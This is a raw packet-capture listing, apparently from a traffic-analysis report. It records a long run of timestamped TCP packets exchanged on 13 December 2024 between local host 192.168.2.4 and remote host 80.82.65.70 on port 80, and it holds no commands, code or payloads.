                                          Dec 13, 2024 08:36:34.209328890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.209367990 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.210603952 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.210665941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.210768938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.210809946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.212119102 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.212176085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.212244034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.212286949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.213541031 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.213804007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.213813066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.213850975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.214819908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.215027094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.215085983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.215126991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.216201067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.216257095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.216316938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.216469049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.217658997 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.217773914 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.218036890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.219011068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.219063044 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.219105959 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.220428944 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.220487118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.220627069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.220670938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.221848011 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.221904993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.221924067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.221966982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.223170042 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.223220110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.223259926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.224580050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.224649906 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.579546928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.580236912 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.580281973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.580383062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.580425978 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.581149101 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.581171989 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.581212044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.582031965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.582081079 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.582133055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.582171917 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.582937002 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.582978964 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.583026886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.583066940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.583846092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.583888054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.583954096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.583992004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.584783077 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.584845066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.584968090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.585005999 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.585664034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.585746050 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.585938931 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.585980892 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.586504936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.586545944 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.586653948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.586800098 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.587409019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.587476015 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.587522984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.587564945 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.588339090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.588409901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.588449955 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.589183092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.589221954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.589281082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.589404106 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.590094090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.590230942 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.590266943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.590989113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.591026068 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.591059923 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.591094971 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.591891050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.591936111 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.592026949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.592127085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.592818975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.592864990 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.592952013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.592997074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.593693018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.593858004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.593864918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.593920946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.594578981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.594753981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.594806910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.595572948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.595619917 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.595695972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.595733881 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.596359968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.596407890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.596470118 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.596514940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.597301006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.597440958 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.597482920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.598150969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.598191023 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.598612070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.598650932 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.599020004 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.599062920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.599272013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.599320889 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.599936008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.599992037 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.600039005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.600079060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.600846052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.600883007 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.600893974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.600919962 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.601778030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.601823092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.601881981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.601923943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.602734089 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.602920055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.602963924 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.603497028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.603548050 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.603602886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.603638887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.604383945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.604429007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.604566097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.604604006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.605324030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.605367899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.606132030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.606177092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.606215954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.606256008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.606408119 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.606456995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.607129097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.607173920 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.607280970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.607321024 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.608103037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.608151913 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.608202934 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.608243942 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.608913898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609002113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609045029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.609760046 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609816074 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.609824896 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.609864950 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.610686064 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.610727072 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.610747099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.610789061 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.611541033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.611582041 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.611608982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.611654043 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.612457037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.612508059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.612649918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.612808943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.613346100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.613390923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.613487959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.613718033 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.614217043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.614288092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.614336014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.614399910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.615134954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.615241051 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.615276098 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.615323067 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.615968943 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.616010904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.704859972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.704916954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705025911 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705064058 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705305099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705351114 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705467939 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705506086 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.705554008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.705621958 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.706419945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.706432104 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.706480026 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.706504107 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.707319021 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.707364082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.770191908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770276070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770334005 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.770365953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.770459890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770551920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.770591974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.771328926 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.771373034 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.771409988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.771452904 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.772262096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.772305965 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.772372007 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.772419930 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.773118019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.773159027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.773224115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.773266077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.774004936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.774044991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.774105072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.774148941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.774887085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775046110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775091887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.775790930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775835991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.775913000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.775958061 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.776685953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.776732922 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.776794910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.776839018 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.777595043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.777652025 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.777693987 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.777736902 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.778459072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.778625011 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.778676033 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.779390097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.779428959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.779449940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.779484034 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.780277014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.780378103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.780431986 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.781157017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.781208038 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.781300068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.781374931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.782025099 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.782075882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.782103062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.782147884 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.782932043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783019066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783066988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.783862114 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783915997 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.783941984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.783986092 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.784759045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.784802914 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.784828901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.784872055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.785651922 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.785697937 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.785809994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.785854101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.786506891 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.786628008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.786681890 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.787409067 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.787461042 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.787539959 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.787589073 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.788299084 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.788350105 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.788446903 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.788500071 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.789264917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.789318085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.789374113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.789431095 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.790107012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.790153980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:34.790220022 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:34.790276051 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.161070108 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.161119938 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.161170006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.161429882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.161912918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.161955118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.162046909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.162085056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.162806988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.162844896 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.162945032 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.162986040 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.163733006 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.163780928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.163924932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.163961887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.164664030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.164709091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.164803028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.164956093 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.165543079 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.165612936 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.165688038 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.165811062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.166449070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.166480064 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.166547060 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.166644096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.167289972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.167330980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.167445898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.167485952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.168178082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.168215036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.168279886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.168315887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.169189930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.169348955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.169385910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.169991970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.170031071 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.170057058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.170097113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.170878887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.170917988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.170979023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.171017885 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.171750069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.171788931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.171850920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.171891928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.172672033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.172712088 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.172732115 CET804977280.82.65.70192.168.2.4
